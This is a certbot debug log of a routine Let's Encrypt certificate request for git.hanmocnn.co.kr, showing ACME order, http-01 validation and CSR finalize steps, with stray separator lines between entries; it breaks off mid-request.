Strict-Transport-Security: max-age=604800
|
||||||
|
|
||||||
|
|
||||||
|
2026-02-15 01:51:50,844:DEBUG:acme.client:Storing nonce: NeKnt8TGdBzHxUclyNbZW9s3_Zgksoml2Lq4pfk94QLSB9SdukQ
|
||||||
|
2026-02-15 01:51:50,844:DEBUG:acme.client:JWS payload:
|
||||||
|
b'{\n "identifiers": [\n {\n "type": "dns",\n "value": "git.hanmocnn.co.kr"\n }\n ]\n}'
|
||||||
|
2026-02-15 01:51:50,850:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/new-order:
|
||||||
|
{
|
||||||
|
"protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMzA2NDM4NjkwNiIsICJub25jZSI6ICJOZUtudDhUR2RCekh4VWNseU5iWlc5czNfWmdrc29tbDJMcTRwZms5NFFMU0I5U2R1a1EiLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL25ldy1vcmRlciJ9",
|
||||||
|
"signature": "qAt8eXKNxxIDV6XMGdk18fBntRW7vcOUV0PZTTDSghKJeeenaQzg4Qz1BDHYaPfkAmEZ6z-TtzeTZvewo3COOxe6qqUOeSOKsWs2GP6SIBSqWoGem8DFRpqk3FVk0vmXIoiupF3plySfrpK5C0gbOGya5OtDDC3nY1UYnFC9aYefhHWqUL61zmQHSA_XCukwwgPP8PgOQ3Cbyi7KSaLAVjp27VKmxGCt6IqmlkZi1VpT8nxXfYpMwQ-VQKDwnSgG7FtjwgSZnJCd2IIJnM3kkaIv-FO51nivhU1pUcxXvk_pnZtLv86_O65fmTLhFlTASOKiaDnoffI-FhZE0KOTvg",
|
||||||
|
"payload": "ewogICJpZGVudGlmaWVycyI6IFsKICAgIHsKICAgICAgInR5cGUiOiAiZG5zIiwKICAgICAgInZhbHVlIjogImdpdC5oYW5tb2Nubi5jby5rciIKICAgIH0KICBdCn0"
|
||||||
|
}
|
||||||
|
2026-02-15 01:51:51,040:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/new-order HTTP/1.1" 201 352
|
||||||
|
2026-02-15 01:51:51,040:DEBUG:acme.client:Received response:
|
||||||
|
HTTP 201
|
||||||
|
Server: nginx
|
||||||
|
Date: Sun, 15 Feb 2026 01:51:50 GMT
|
||||||
|
Content-Type: application/json
|
||||||
|
Content-Length: 352
|
||||||
|
Connection: keep-alive
|
||||||
|
Boulder-Requester: 3064386906
|
||||||
|
Cache-Control: public, max-age=0, no-cache
|
||||||
|
Link: <https://acme-v02.api.letsencrypt.org/directory>;rel="index"
|
||||||
|
Location: https://acme-v02.api.letsencrypt.org/acme/order/3064386906/480408820986
|
||||||
|
Replay-Nonce: NeKnt8TGHmpTiA8eUyeODagzdJZLQFsIFH4bWqSCTp34fwUNaU4
|
||||||
|
X-Frame-Options: DENY
|
||||||
|
Strict-Transport-Security: max-age=604800
|
||||||
|
|
||||||
|
{
|
||||||
|
"status": "pending",
|
||||||
|
"expires": "2026-02-22T01:51:50Z",
|
||||||
|
"identifiers": [
|
||||||
|
{
|
||||||
|
"type": "dns",
|
||||||
|
"value": "git.hanmocnn.co.kr"
|
||||||
|
}
|
||||||
|
],
|
||||||
|
"authorizations": [
|
||||||
|
"https://acme-v02.api.letsencrypt.org/acme/authz/3064386906/658839462036"
|
||||||
|
],
|
||||||
|
"finalize": "https://acme-v02.api.letsencrypt.org/acme/finalize/3064386906/480408820986"
|
||||||
|
}
|
||||||
|
2026-02-15 01:51:51,040:DEBUG:acme.client:Storing nonce: NeKnt8TGHmpTiA8eUyeODagzdJZLQFsIFH4bWqSCTp34fwUNaU4
|
||||||
|
2026-02-15 01:51:51,041:DEBUG:acme.client:JWS payload:
|
||||||
|
b''
|
||||||
|
2026-02-15 01:51:51,045:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/authz/3064386906/658839462036:
|
||||||
|
{
|
||||||
|
"protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMzA2NDM4NjkwNiIsICJub25jZSI6ICJOZUtudDhUR0htcFRpQThlVXllT0RhZ3pkSlpMUUZzSUZINGJXcVNDVHAzNGZ3VU5hVTQiLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2F1dGh6LzMwNjQzODY5MDYvNjU4ODM5NDYyMDM2In0",
|
||||||
|
"signature": "xD5_zw4XMvY1xlo89Kw8bnTshAIEzOReJhnmZtVJoDWODLY0tZyeNLnS5As4aNG3urUYk_2V-DdHxWa3KVqNnUoWiU3zEk4NYrAfc12VEIdJpn3XhrTtgrM7t1qhXO8RjIt_9QwR1jjmp7moDIIFHsUw-pDmzGGQTh619IhVl7aPb--Szq0F-EmOD1r1T9bD3YgrKLSw47qPwytNmwnshzT8p-c9oGrU577S5DN2Wqorzbx0BSW_--DAoc2kVkdkrKs-nNrfSaY07bxQGDQXQNnSdYgyiIJKu1F-wB22KUBes5ms6o8k1FqOLXyNgymzjUcuZ0hfYe3sZ6E4TlHrWQ",
|
||||||
|
"payload": ""
|
||||||
|
}
|
||||||
|
2026-02-15 01:51:51,203:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/authz/3064386906/658839462036 HTTP/1.1" 200 826
|
||||||
|
2026-02-15 01:51:51,204:DEBUG:acme.client:Received response:
|
||||||
|
HTTP 200
|
||||||
|
Server: nginx
|
||||||
|
Date: Sun, 15 Feb 2026 01:51:51 GMT
|
||||||
|
Content-Type: application/json
|
||||||
|
Content-Length: 826
|
||||||
|
Connection: keep-alive
|
||||||
|
Boulder-Requester: 3064386906
|
||||||
|
Cache-Control: public, max-age=0, no-cache
|
||||||
|
Link: <https://acme-v02.api.letsencrypt.org/directory>;rel="index"
|
||||||
|
Replay-Nonce: 4AH-2vvBn0w9qfwZhLqSAyLL6pOKIlFnF7FvghSQeN3TK7jb0WM
|
||||||
|
X-Frame-Options: DENY
|
||||||
|
Strict-Transport-Security: max-age=604800
|
||||||
|
|
||||||
|
{
|
||||||
|
"identifier": {
|
||||||
|
"type": "dns",
|
||||||
|
"value": "git.hanmocnn.co.kr"
|
||||||
|
},
|
||||||
|
"status": "pending",
|
||||||
|
"expires": "2026-02-22T01:51:50Z",
|
||||||
|
"challenges": [
|
||||||
|
{
|
||||||
|
"type": "tls-alpn-01",
|
||||||
|
"url": "https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658839462036/wUR-nQ",
|
||||||
|
"status": "pending",
|
||||||
|
"token": "lYADYtOgtUUXj8WVH2qa0AW6RT8-qr577RV-yS7nYY0"
|
||||||
|
},
|
||||||
|
{
|
||||||
|
"type": "dns-01",
|
||||||
|
"url": "https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658839462036/muacBg",
|
||||||
|
"status": "pending",
|
||||||
|
"token": "lYADYtOgtUUXj8WVH2qa0AW6RT8-qr577RV-yS7nYY0"
|
||||||
|
},
|
||||||
|
{
|
||||||
|
"type": "http-01",
|
||||||
|
"url": "https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658839462036/WBcYRQ",
|
||||||
|
"status": "pending",
|
||||||
|
"token": "lYADYtOgtUUXj8WVH2qa0AW6RT8-qr577RV-yS7nYY0"
|
||||||
|
}
|
||||||
|
]
|
||||||
|
}
|
||||||
|
2026-02-15 01:51:51,204:DEBUG:acme.client:Storing nonce: 4AH-2vvBn0w9qfwZhLqSAyLL6pOKIlFnF7FvghSQeN3TK7jb0WM
|
||||||
|
2026-02-15 01:51:51,205:DEBUG:acme.challenges:tls-alpn-01 was not recognized, full message: {'type': 'tls-alpn-01', 'url': 'https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658839462036/wUR-nQ', 'status': 'pending', 'token': 'lYADYtOgtUUXj8WVH2qa0AW6RT8-qr577RV-yS7nYY0'}
|
||||||
|
2026-02-15 01:51:51,205:INFO:certbot._internal.auth_handler:Performing the following challenges:
|
||||||
|
2026-02-15 01:51:51,205:INFO:certbot._internal.auth_handler:http-01 challenge for Identifier(typ=IdentifierType(dns), value='git.hanmocnn.co.kr')
|
||||||
|
2026-02-15 01:51:51,206:INFO:certbot._internal.plugins.webroot:Using the webroot path /data/letsencrypt-acme-challenge for all unmatched domains.
|
||||||
|
2026-02-15 01:51:51,206:DEBUG:certbot._internal.plugins.webroot:Creating root challenges validation dir at /data/letsencrypt-acme-challenge/.well-known/acme-challenge
|
||||||
|
2026-02-15 01:51:51,207:DEBUG:certbot._internal.plugins.webroot:Attempting to save validation to /data/letsencrypt-acme-challenge/.well-known/acme-challenge/lYADYtOgtUUXj8WVH2qa0AW6RT8-qr577RV-yS7nYY0
|
||||||
|
2026-02-15 01:51:51,208:DEBUG:acme.client:JWS payload:
|
||||||
|
b'{}'
|
||||||
|
2026-02-15 01:51:51,212:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658839462036/WBcYRQ:
|
||||||
|
{
|
||||||
|
"protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMzA2NDM4NjkwNiIsICJub25jZSI6ICI0QUgtMnZ2Qm4wdzlxZndaaExxU0F5TEw2cE9LSWxGbkY3RnZnaFNRZU4zVEs3amIwV00iLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2NoYWxsLzMwNjQzODY5MDYvNjU4ODM5NDYyMDM2L1dCY1lSUSJ9",
|
||||||
|
"signature": "NBWiYVLMnqzqVjVd9e2EOtYQIaoXr58024Qvuw6w-bluVIrcYqsRzjqIYI6xMcmuOAArmP0ARse7Fe7Nfdv0y6XvMQqhZyX3ttOp3LzCKLKARrz0ze-VI6Qit6OhFHUb-4M8ly-bU50uETtv-suWUD2N7mzTPHgJYsV4bCnNw-06YfRev5KGyu-pkZnXb_5BkbvAVqLCWGZpHLZ9P2maQSK38isRzRRvg_Yph53XTkm7_Apt48RvyciOSvRpxT0y4GitmuL_S6kqaiJUJnsQXAi8iZT6AlNd4JfWgy-IKNd-pLeJML9Jp5Ml6VMEY8cjpGbC4rvRAEO4ghJ_gMNV2A",
|
||||||
|
"payload": "e30"
|
||||||
|
}
|
||||||
|
2026-02-15 01:51:51,374:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/chall/3064386906/658839462036/WBcYRQ HTTP/1.1" 200 195
|
||||||
|
2026-02-15 01:51:51,375:DEBUG:acme.client:Received response:
|
||||||
|
HTTP 200
|
||||||
|
Server: nginx
|
||||||
|
Date: Sun, 15 Feb 2026 01:51:51 GMT
|
||||||
|
Content-Type: application/json
|
||||||
|
Content-Length: 195
|
||||||
|
Connection: keep-alive
|
||||||
|
Boulder-Requester: 3064386906
|
||||||
|
Cache-Control: public, max-age=0, no-cache
|
||||||
|
Link: <https://acme-v02.api.letsencrypt.org/directory>;rel="index", <https://acme-v02.api.letsencrypt.org/acme/authz/3064386906/658839462036>;rel="up"
|
||||||
|
Location: https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658839462036/WBcYRQ
|
||||||
|
Replay-Nonce: NeKnt8TGCVoX15XqxHcH8EwLY7mU0fhc5iu-W8E95dWPI9_TGIQ
|
||||||
|
X-Frame-Options: DENY
|
||||||
|
Strict-Transport-Security: max-age=604800
|
||||||
|
|
||||||
|
{
|
||||||
|
"type": "http-01",
|
||||||
|
"url": "https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658839462036/WBcYRQ",
|
||||||
|
"status": "pending",
|
||||||
|
"token": "lYADYtOgtUUXj8WVH2qa0AW6RT8-qr577RV-yS7nYY0"
|
||||||
|
}
|
||||||
|
2026-02-15 01:51:51,375:DEBUG:acme.client:Storing nonce: NeKnt8TGCVoX15XqxHcH8EwLY7mU0fhc5iu-W8E95dWPI9_TGIQ
|
||||||
|
2026-02-15 01:51:51,376:INFO:certbot._internal.auth_handler:Waiting for verification...
|
||||||
|
2026-02-15 01:51:52,376:DEBUG:acme.client:JWS payload:
|
||||||
|
b''
|
||||||
|
2026-02-15 01:51:52,381:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/authz/3064386906/658839462036:
|
||||||
|
{
|
||||||
|
"protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMzA2NDM4NjkwNiIsICJub25jZSI6ICJOZUtudDhUR0NWb1gxNVhxeEhjSDhFd0xZN21VMGZoYzVpdS1XOEU5NWRXUEk5X1RHSVEiLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2F1dGh6LzMwNjQzODY5MDYvNjU4ODM5NDYyMDM2In0",
|
||||||
|
"signature": "N6i0RDdH_G5bVERBFzfAVluCZhhP2xSxxI7hxgoPJMPZM70W3Qh9XWQE_nhQ4MKRuTmMeWT8tCk6bd-EJaengkWN1gNIVvO52HigUYqZaIMF0GD0nbk4IBchm-fSbmP6-iypz0l-NiOwVQlQ-bzcZpjzaEXaJJ0UN42bJNKwuri_JGsg1plUK0tryOkH5prUI1Uie21HHJI41SGT02mUBsPRGR6Ef3xAVPjNYJUt73iG780B6fQgYxz81h_P2tFI5-BKzLq-Z6k2S_dDbE4qvRmB6yGEyhMa32myHj_uvGTviXnkUeCN145_rVW-uwTyMc3xf78O6bSK-eNPW-A2nA",
|
||||||
|
"payload": ""
|
||||||
|
}
|
||||||
|
2026-02-15 01:51:52,540:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/authz/3064386906/658839462036 HTTP/1.1" 200 826
|
||||||
|
2026-02-15 01:51:52,541:DEBUG:acme.client:Received response:
|
||||||
|
HTTP 200
|
||||||
|
Server: nginx
|
||||||
|
Date: Sun, 15 Feb 2026 01:51:52 GMT
|
||||||
|
Content-Type: application/json
|
||||||
|
Content-Length: 826
|
||||||
|
Connection: keep-alive
|
||||||
|
Boulder-Requester: 3064386906
|
||||||
|
Cache-Control: public, max-age=0, no-cache
|
||||||
|
Link: <https://acme-v02.api.letsencrypt.org/directory>;rel="index"
|
||||||
|
Replay-Nonce: 4AH-2vvB1NFpJwJJf_Ae4W9KuOSW8LOksIsULxEYip-Juqi8PIQ
|
||||||
|
X-Frame-Options: DENY
|
||||||
|
Strict-Transport-Security: max-age=604800
|
||||||
|
|
||||||
|
{
|
||||||
|
"identifier": {
|
||||||
|
"type": "dns",
|
||||||
|
"value": "git.hanmocnn.co.kr"
|
||||||
|
},
|
||||||
|
"status": "pending",
|
||||||
|
"expires": "2026-02-22T01:51:50Z",
|
||||||
|
"challenges": [
|
||||||
|
{
|
||||||
|
"type": "http-01",
|
||||||
|
"url": "https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658839462036/WBcYRQ",
|
||||||
|
"status": "pending",
|
||||||
|
"token": "lYADYtOgtUUXj8WVH2qa0AW6RT8-qr577RV-yS7nYY0"
|
||||||
|
},
|
||||||
|
{
|
||||||
|
"type": "dns-01",
|
||||||
|
"url": "https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658839462036/muacBg",
|
||||||
|
"status": "pending",
|
||||||
|
"token": "lYADYtOgtUUXj8WVH2qa0AW6RT8-qr577RV-yS7nYY0"
|
||||||
|
},
|
||||||
|
{
|
||||||
|
"type": "tls-alpn-01",
|
||||||
|
"url": "https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658839462036/wUR-nQ",
|
||||||
|
"status": "pending",
|
||||||
|
"token": "lYADYtOgtUUXj8WVH2qa0AW6RT8-qr577RV-yS7nYY0"
|
||||||
|
}
|
||||||
|
]
|
||||||
|
}
|
||||||
|
2026-02-15 01:51:52,541:DEBUG:acme.client:Storing nonce: 4AH-2vvB1NFpJwJJf_Ae4W9KuOSW8LOksIsULxEYip-Juqi8PIQ
|
||||||
|
2026-02-15 01:51:52,542:DEBUG:acme.challenges:tls-alpn-01 was not recognized, full message: {'type': 'tls-alpn-01', 'url': 'https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658839462036/wUR-nQ', 'status': 'pending', 'token': 'lYADYtOgtUUXj8WVH2qa0AW6RT8-qr577RV-yS7nYY0'}
|
||||||
|
2026-02-15 01:51:55,542:DEBUG:acme.client:JWS payload:
|
||||||
|
b''
|
||||||
|
2026-02-15 01:51:55,547:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/authz/3064386906/658839462036:
|
||||||
|
{
|
||||||
|
"protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMzA2NDM4NjkwNiIsICJub25jZSI6ICI0QUgtMnZ2QjFORnBKd0pKZl9BZTRXOUt1T1NXOExPa3NJc1VMeEVZaXAtSnVxaThQSVEiLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2F1dGh6LzMwNjQzODY5MDYvNjU4ODM5NDYyMDM2In0",
|
||||||
|
"signature": "aeilg5d0s3qXqzNgy5o4cI0bUyNxIYqVvjXF8tvdBmsE1iUpYFYWDzXl7oEmAxua5q8E2U6JkBHdgPJ_vsZd3z6B_557GAG1AVnOQacxvVpHLkvw-m8BVVYkonCM19Fb0NbYRJHfhNGXn_EnoiXmuOfkcdBmjk-7vj3lT2tPcjQTNBdJu7i6QZHdP5ucPjJYSbRzZbd_LLI385LPvFmgAZBlCL_0dYBUNrP2uqNF45WNaceJUqIjYyUb5tRGF4xjXqcQD2rg2EndgVKCEHRF2fTheOjD-2jeoADDgf0E6OC8eVc704K_vASf6nsVQPnof9U3A8EjijoEH1a6kpsxEQ",
|
||||||
|
"payload": ""
|
||||||
|
}
|
||||||
|
2026-02-15 01:51:55,717:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/authz/3064386906/658839462036 HTTP/1.1" 200 826
|
||||||
|
2026-02-15 01:51:55,718:DEBUG:acme.client:Received response:
|
||||||
|
HTTP 200
|
||||||
|
Server: nginx
|
||||||
|
Date: Sun, 15 Feb 2026 01:51:55 GMT
|
||||||
|
Content-Type: application/json
|
||||||
|
Content-Length: 826
|
||||||
|
Connection: keep-alive
|
||||||
|
Boulder-Requester: 3064386906
|
||||||
|
Cache-Control: public, max-age=0, no-cache
|
||||||
|
Link: <https://acme-v02.api.letsencrypt.org/directory>;rel="index"
|
||||||
|
Replay-Nonce: 4AH-2vvB61k-bHUD2nLTVwKznjz8siFeraoWuDQ8EfVBNIm65n0
|
||||||
|
X-Frame-Options: DENY
|
||||||
|
Strict-Transport-Security: max-age=604800
|
||||||
|
|
||||||
|
{
|
||||||
|
"identifier": {
|
||||||
|
"type": "dns",
|
||||||
|
"value": "git.hanmocnn.co.kr"
|
||||||
|
},
|
||||||
|
"status": "pending",
|
||||||
|
"expires": "2026-02-22T01:51:50Z",
|
||||||
|
"challenges": [
|
||||||
|
{
|
||||||
|
"type": "tls-alpn-01",
|
||||||
|
"url": "https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658839462036/wUR-nQ",
|
||||||
|
"status": "pending",
|
||||||
|
"token": "lYADYtOgtUUXj8WVH2qa0AW6RT8-qr577RV-yS7nYY0"
|
||||||
|
},
|
||||||
|
{
|
||||||
|
"type": "dns-01",
|
||||||
|
"url": "https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658839462036/muacBg",
|
||||||
|
"status": "pending",
|
||||||
|
"token": "lYADYtOgtUUXj8WVH2qa0AW6RT8-qr577RV-yS7nYY0"
|
||||||
|
},
|
||||||
|
{
|
||||||
|
"type": "http-01",
|
||||||
|
"url": "https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658839462036/WBcYRQ",
|
||||||
|
"status": "pending",
|
||||||
|
"token": "lYADYtOgtUUXj8WVH2qa0AW6RT8-qr577RV-yS7nYY0"
|
||||||
|
}
|
||||||
|
]
|
||||||
|
}
|
||||||
|
2026-02-15 01:51:55,718:DEBUG:acme.client:Storing nonce: 4AH-2vvB61k-bHUD2nLTVwKznjz8siFeraoWuDQ8EfVBNIm65n0
|
||||||
|
2026-02-15 01:51:55,719:DEBUG:acme.challenges:tls-alpn-01 was not recognized, full message: {'type': 'tls-alpn-01', 'url': 'https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658839462036/wUR-nQ', 'status': 'pending', 'token': 'lYADYtOgtUUXj8WVH2qa0AW6RT8-qr577RV-yS7nYY0'}
|
||||||
|
2026-02-15 01:51:58,719:DEBUG:acme.client:JWS payload:
|
||||||
|
b''
|
||||||
|
2026-02-15 01:51:58,724:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/authz/3064386906/658839462036:
|
||||||
|
{
|
||||||
|
"protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMzA2NDM4NjkwNiIsICJub25jZSI6ICI0QUgtMnZ2QjYxay1iSFVEMm5MVFZ3S3puano4c2lGZXJhb1d1RFE4RWZWQk5JbTY1bjAiLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2F1dGh6LzMwNjQzODY5MDYvNjU4ODM5NDYyMDM2In0",
|
||||||
|
"signature": "Bf3p3q3x5ird5lIrcYEqZFpBjd7vZp3yT_VhYkDIOkm40183LdxR5LDHsSfrKxFeqKdRBQuPfUuCpRBrelnYNi9o0Cd0QAIPiX1Hi42d66kJxgRyXfK7RdoJCU-Uz-mxqdjjyfNccdvfMLw5q1G3h0_OIF9uG9aqgvzfiHlqRjkgWCKssljiK8inROYYBdnwagXLY8pczDgBBTkFixYe5jWERqNy707OWr8221oirH7pLJOKPKHhX3auh83Ag7sYCJjdfRQQy23T4aO361QbGoc-iDQaJh0OdffiwWcK9eXDZcsnffnAmw-fOcPfkAGQ7dFFp_ID4nRtUVGseutg7g",
|
||||||
|
"payload": ""
|
||||||
|
}
|
||||||
|
2026-02-15 01:51:58,935:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/authz/3064386906/658839462036 HTTP/1.1" 200 777
|
||||||
|
2026-02-15 01:51:58,936:DEBUG:acme.client:Received response:
|
||||||
|
HTTP 200
|
||||||
|
Server: nginx
|
||||||
|
Date: Sun, 15 Feb 2026 01:51:58 GMT
|
||||||
|
Content-Type: application/json
|
||||||
|
Content-Length: 777
|
||||||
|
Connection: keep-alive
|
||||||
|
Boulder-Requester: 3064386906
|
||||||
|
Cache-Control: public, max-age=0, no-cache
|
||||||
|
Link: <https://acme-v02.api.letsencrypt.org/directory>;rel="index"
|
||||||
|
Replay-Nonce: NeKnt8TGIbNKaCBMKC63TiK-p6jRjvD008EcbuzJwDcYDsYMei8
|
||||||
|
X-Frame-Options: DENY
|
||||||
|
Strict-Transport-Security: max-age=604800
|
||||||
|
|
||||||
|
{
|
||||||
|
"identifier": {
|
||||||
|
"type": "dns",
|
||||||
|
"value": "git.hanmocnn.co.kr"
|
||||||
|
},
|
||||||
|
"status": "valid",
|
||||||
|
"expires": "2026-03-17T01:51:57Z",
|
||||||
|
"challenges": [
|
||||||
|
{
|
||||||
|
"type": "http-01",
|
||||||
|
"url": "https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658839462036/WBcYRQ",
|
||||||
|
"status": "valid",
|
||||||
|
"validated": "2026-02-15T01:51:51Z",
|
||||||
|
"token": "lYADYtOgtUUXj8WVH2qa0AW6RT8-qr577RV-yS7nYY0",
|
||||||
|
"validationRecord": [
|
||||||
|
{
|
||||||
|
"url": "http://git.hanmocnn.co.kr/.well-known/acme-challenge/lYADYtOgtUUXj8WVH2qa0AW6RT8-qr577RV-yS7nYY0",
|
||||||
|
"hostname": "git.hanmocnn.co.kr",
|
||||||
|
"port": "80",
|
||||||
|
"addressesResolved": [
|
||||||
|
"222.117.41.51"
|
||||||
|
],
|
||||||
|
"addressUsed": "222.117.41.51"
|
||||||
|
}
|
||||||
|
]
|
||||||
|
}
|
||||||
|
]
|
||||||
|
}
|
||||||
|
2026-02-15 01:51:58,937:DEBUG:acme.client:Storing nonce: NeKnt8TGIbNKaCBMKC63TiK-p6jRjvD008EcbuzJwDcYDsYMei8
|
||||||
|
2026-02-15 01:51:58,937:DEBUG:certbot._internal.error_handler:Calling registered functions
|
||||||
|
2026-02-15 01:51:58,937:INFO:certbot._internal.auth_handler:Cleaning up challenges
|
||||||
|
2026-02-15 01:51:58,938:DEBUG:certbot._internal.plugins.webroot:Removing /data/letsencrypt-acme-challenge/.well-known/acme-challenge/lYADYtOgtUUXj8WVH2qa0AW6RT8-qr577RV-yS7nYY0
|
||||||
|
2026-02-15 01:51:58,938:DEBUG:certbot._internal.plugins.webroot:All challenges cleaned up
|
||||||
|
2026-02-15 01:51:58,938:DEBUG:certbot._internal.client:CSR: CSR(file=None, data=b'-----BEGIN CERTIFICATE REQUEST-----\nMIIBKDCBrwIBADAAMHYwEAYHKoZIzj0CAQYFK4EEACIDYgAE3ZB1deeblgoVMoPU\nK2iFU5FbwLKFHWK/JtLfmdLhuzQRDtQMR3pV5A4W8NWINvFWEcWdRH2Rqv0uIwWe\nsQZYRHcCcCGIZvYcF+dmwsZ1jLge9RSo/+kLdhLXyZ754afZoDAwLgYJKoZIhvcN\nAQkOMSEwHzAdBgNVHREEFjAUghJnaXQuaGFubW9jbm4uY28ua3IwCgYIKoZIzj0E\nAwIDaAAwZQIwaW490qutHUvSKLq5U2DIOTyCJERSKZFL13USO3MYRJbSBz11vK7r\nAgJ7e4qKXzqWAjEA8ONFmEjWmt2839uiJ6vbkLL7Jq5n2Uh8a9LdcNA5cybkohXZ\n0tSqH7xYtqphQHJK\n-----END CERTIFICATE REQUEST-----\n', form='pem')
|
||||||
|
2026-02-15 01:51:58,939:DEBUG:certbot._internal.client:Will poll for certificate issuance until 2026-02-15 01:53:28.939521
|
||||||
|
2026-02-15 01:51:58,940:DEBUG:acme.client:JWS payload:
|
||||||
|
b'{\n "csr": "MIIBKDCBrwIBADAAMHYwEAYHKoZIzj0CAQYFK4EEACIDYgAE3ZB1deeblgoVMoPUK2iFU5FbwLKFHWK_JtLfmdLhuzQRDtQMR3pV5A4W8NWINvFWEcWdRH2Rqv0uIwWesQZYRHcCcCGIZvYcF-dmwsZ1jLge9RSo_-kLdhLXyZ754afZoDAwLgYJKoZIhvcNAQkOMSEwHzAdBgNVHREEFjAUghJnaXQuaGFubW9jbm4uY28ua3IwCgYIKoZIzj0EAwIDaAAwZQIwaW490qutHUvSKLq5U2DIOTyCJERSKZFL13USO3MYRJbSBz11vK7rAgJ7e4qKXzqWAjEA8ONFmEjWmt2839uiJ6vbkLL7Jq5n2Uh8a9LdcNA5cybkohXZ0tSqH7xYtqphQHJK"\n}'
|
||||||
|
2026-02-15 01:51:58,944:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/finalize/3064386906/480408820986:
|
||||||
|
{
|
||||||
|
"protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMzA2NDM4NjkwNiIsICJub25jZSI6ICJOZUtudDhUR0liTkthQ0JNS0M2M1RpSy1wNmpSanZEMDA4RWNidXpKd0RjWURzWU1laTgiLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2ZpbmFsaXplLzMwNjQzODY5MDYvNDgwNDA4ODIwOTg2In0",
|
||||||
|
"signature": "Ukf2rgjKwRIhy_p0rhlecNFkjSaEyuOoxgZ3lO2zYspObZ2xUft9pdZkpYYeBBPZijLo0z_BjPzUZxKi7da69adu2bVbHRmMEVtlilSY346fAU7oo4NUl8Vs7db33H4FeM623R-EGnTozPzeVAu6nzAwlzg5q7LUSjXy_fEP1f7u1mDDI8o81qnEhmje-UiLRAVsYg88gNf_NIo3Bhfb5tyPcJV12OXHxnGo-4Yisd3IH-x5k0aVzKp6CZ6wgW70Lgtx6cW222yUrk-3MBSFBO3n5WGn2e1dKX0tBqiYcuEoqrSH8qf50bIL41g8ty5SjzONuyIUo_KUaLTIRUZBZw",
|
||||||
|
